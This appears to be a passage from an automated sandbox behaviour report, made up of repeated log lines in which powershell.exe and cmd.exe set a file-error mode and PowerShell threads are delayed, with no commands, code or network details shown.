    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4860Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2120Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7611Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2144Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7757Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1874Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8162Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1395Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5290
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4490
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1766
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1295
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1028
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8188
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1537
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7904
